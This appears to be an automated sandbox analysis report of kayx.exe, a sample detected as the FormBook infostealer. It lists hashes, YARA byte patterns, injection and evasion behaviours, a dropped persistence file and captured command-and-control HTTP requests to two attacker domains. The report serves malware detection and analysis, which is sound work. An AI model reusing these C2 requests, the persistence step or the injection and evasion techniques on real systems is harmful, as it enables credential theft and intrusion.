Play interactive tour

Edit tour

Analysis Report kayx.exe

Overview

General Information

Sample Name:	kayx.exe
Analysis ID:	321226
MD5:	a80e73a824b655491f54278b7a29467d
SHA1:	f33ddffc223c9afa4e226d3567b990a8e44828e6
SHA256:	bdcd13abdded8f4f709fb288fb78b4afff486854b3ea78ad378d11220a31c3c4
Tags:	exeFormbook
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

kayx.exe (PID: 6524 cmdline: 'C:\Users\user\Desktop\kayx.exe' MD5: A80E73A824B655491F54278B7A29467D)

kayx.exe (PID: 6932 cmdline: C:\Users\user\Desktop\kayx.exe MD5: A80E73A824B655491F54278B7A29467D)

kayx.exe (PID: 6916 cmdline: C:\Users\user\Desktop\kayx.exe MD5: A80E73A824B655491F54278B7A29467D)

kayx.exe (PID: 6900 cmdline: C:\Users\user\Desktop\kayx.exe MD5: A80E73A824B655491F54278B7A29467D)

explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

firefoxe.exe (PID: 3032 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe' MD5: A80E73A824B655491F54278B7A29467D)

firefoxe.exe (PID: 2128 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe' MD5: A80E73A824B655491F54278B7A29467D)

mstsc.exe (PID: 6072 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)

cmd.exe (PID: 4816 cmdline: /c del 'C:\Users\user\Desktop\kayx.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 1632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16079:$sqlite3step: 68 34 1C 7B E1 0x1618c:$sqlite3step: 68 34 1C 7B E1 0x160a8:$sqlite3text: 68 38 2A 90 C5 0x161cd:$sqlite3text: 68 38 2A 90 C5 0x160bb:$sqlite3blob: 68 53 D8 7F 8C 0x161e3:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16079:$sqlite3step: 68 34 1C 7B E1 0x1618c:$sqlite3step: 68 34 1C 7B E1 0x160a8:$sqlite3text: 68 38 2A 90 C5 0x161cd:$sqlite3text: 68 38 2A 90 C5 0x160bb:$sqlite3blob: 68 53 D8 7F 8C 0x161e3:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16079:$sqlite3step: 68 34 1C 7B E1 0x1618c:$sqlite3step: 68 34 1C 7B E1 0x160a8:$sqlite3text: 68 38 2A 90 C5 0x161cd:$sqlite3text: 68 38 2A 90 C5 0x160bb:$sqlite3blob: 68 53 D8 7F 8C 0x161e3:$sqlite3blob: 68 53 D8 7F 8C
00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16079:$sqlite3step: 68 34 1C 7B E1 0x1618c:$sqlite3step: 68 34 1C 7B E1 0x160a8:$sqlite3text: 68 38 2A 90 C5 0x161cd:$sqlite3text: 68 38 2A 90 C5 0x160bb:$sqlite3blob: 68 53 D8 7F 8C 0x161e3:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16079:$sqlite3step: 68 34 1C 7B E1 0x1618c:$sqlite3step: 68 34 1C 7B E1 0x160a8:$sqlite3text: 68 38 2A 90 C5 0x161cd:$sqlite3text: 68 38 2A 90 C5 0x160bb:$sqlite3blob: 68 53 D8 7F 8C 0x161e3:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16079:$sqlite3step: 68 34 1C 7B E1 0x1618c:$sqlite3step: 68 34 1C 7B E1 0x160a8:$sqlite3text: 68 38 2A 90 C5 0x161cd:$sqlite3text: 68 38 2A 90 C5 0x160bb:$sqlite3blob: 68 53 D8 7F 8C 0x161e3:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x147918:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x147cb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16e538:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16e8d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1b3580:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1b391a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1535c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17a1e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1bf22d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1d464d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1530b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x179cd1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1bed19:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1d4139:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1536c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17a2e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1bf32f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1d474f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15383f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x17a45f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1bf4a7:$sequence_4: 5D C3 8D 50 7C 80 FA 07
00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1555c9:$sqlite3step: 68 34 1C 7B E1 0x1556dc:$sqlite3step: 68 34 1C 7B E1 0x17c1e9:$sqlite3step: 68 34 1C 7B E1 0x17c2fc:$sqlite3step: 68 34 1C 7B E1 0x1c1231:$sqlite3step: 68 34 1C 7B E1 0x1c1344:$sqlite3step: 68 34 1C 7B E1 0x1d6651:$sqlite3step: 68 34 1C 7B E1 0x1d6764:$sqlite3step: 68 34 1C 7B E1 0x1555f8:$sqlite3text: 68 38 2A 90 C5 0x15571d:$sqlite3text: 68 38 2A 90 C5 0x17c218:$sqlite3text: 68 38 2A 90 C5 0x17c33d:$sqlite3text: 68 38 2A 90 C5 0x1c1260:$sqlite3text: 68 38 2A 90 C5 0x1c1385:$sqlite3text: 68 38 2A 90 C5 0x1d6680:$sqlite3text: 68 38 2A 90 C5 0x1d67a5:$sqlite3text: 68 38 2A 90 C5 0x15560b:$sqlite3blob: 68 53 D8 7F 8C 0x155733:$sqlite3blob: 68 53 D8 7F 8C 0x17c22b:$sqlite3blob: 68 53 D8 7F 8C 0x17c353:$sqlite3blob: 68 53 D8 7F 8C 0x1c1273:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
17.2.kayx.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
17.2.kayx.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x75c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7962:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13275:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x12d61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13377:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x134ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x836a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x11fdc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x90e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18357:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x193ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
17.2.kayx.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15279:$sqlite3step: 68 34 1C 7B E1 0x1538c:$sqlite3step: 68 34 1C 7B E1 0x152a8:$sqlite3text: 68 38 2A 90 C5 0x153cd:$sqlite3text: 68 38 2A 90 C5 0x152bb:$sqlite3blob: 68 53 D8 7F 8C 0x153e3:$sqlite3blob: 68 53 D8 7F 8C
17.1.kayx.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
17.1.kayx.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x75c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7962:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13275:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x12d61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13377:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x134ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x836a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x11fdc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x90e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18357:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x193ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
17.1.kayx.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15279:$sqlite3step: 68 34 1C 7B E1 0x1538c:$sqlite3step: 68 34 1C 7B E1 0x152a8:$sqlite3text: 68 38 2A 90 C5 0x153cd:$sqlite3text: 68 38 2A 90 C5 0x152bb:$sqlite3blob: 68 53 D8 7F 8C 0x153e3:$sqlite3blob: 68 53 D8 7F 8C
17.1.kayx.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
17.1.kayx.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
17.1.kayx.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16079:$sqlite3step: 68 34 1C 7B E1 0x1618c:$sqlite3step: 68 34 1C 7B E1 0x160a8:$sqlite3text: 68 38 2A 90 C5 0x161cd:$sqlite3text: 68 38 2A 90 C5 0x160bb:$sqlite3blob: 68 53 D8 7F 8C 0x161e3:$sqlite3blob: 68 53 D8 7F 8C
17.2.kayx.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
17.2.kayx.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
17.2.kayx.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16079:$sqlite3step: 68 34 1C 7B E1 0x1618c:$sqlite3step: 68 34 1C 7B E1 0x160a8:$sqlite3text: 68 38 2A 90 C5 0x161cd:$sqlite3text: 68 38 2A 90 C5 0x160bb:$sqlite3blob: 68 53 D8 7F 8C 0x161e3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 7 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: kayx.exe

Avira: detected

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe

Avira: detection malicious, Label: TR/Dropper.MSIL.blecg

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe

ReversingLabs: Detection: 45%

Multi AV Scanner detection for submitted file

Show sources

Source: kayx.exe	Virustotal: Detection: 34%			Perma Link
Source: kayx.exe	ReversingLabs: Detection: 45%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: kayx.exe

Joe Sandbox ML: detected

Source: 17.2.kayx.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.1.kayx.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior

Source: C:\Users\user\Desktop\kayx.exe	Code function: 4x nop then pop edi		17_2_0040C122
Source: C:\Users\user\Desktop\kayx.exe	Code function: 4x nop then pop edi		17_1_0040C122

Source: global traffic	HTTP traffic detected: GET /bg8v/?dR-0T=Hsg8WmNsaLMOQIlEIMfuFbk4MqbSZJWeSLNd01xx1olwbrd2uyfvFyB8JS14b3uA3WpV&Fxl0dR=KdShEXiX HTTP/1.1Host: www.ghoster.agencyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX HTTP/1.1Host: www.jibenentreprenad.mobiConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 184.168.131.241 184.168.131.241
Source: Joe Sandbox View	IP Address: 184.168.131.241 184.168.131.241

Source: Joe Sandbox View

ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS

Source: global traffic	HTTP traffic detected: GET /bg8v/?dR-0T=Hsg8WmNsaLMOQIlEIMfuFbk4MqbSZJWeSLNd01xx1olwbrd2uyfvFyB8JS14b3uA3WpV&Fxl0dR=KdShEXiX HTTP/1.1Host: www.ghoster.agencyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX HTTP/1.1Host: www.jibenentreprenad.mobiConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.ghoster.agency

Source: explorer.exe, 00000012.00000000.377196648.000000000F640000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000012.00000000.377196648.000000000F640000.00000004.00000001.sdmp	String found in binary or memory: http://crl.v
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
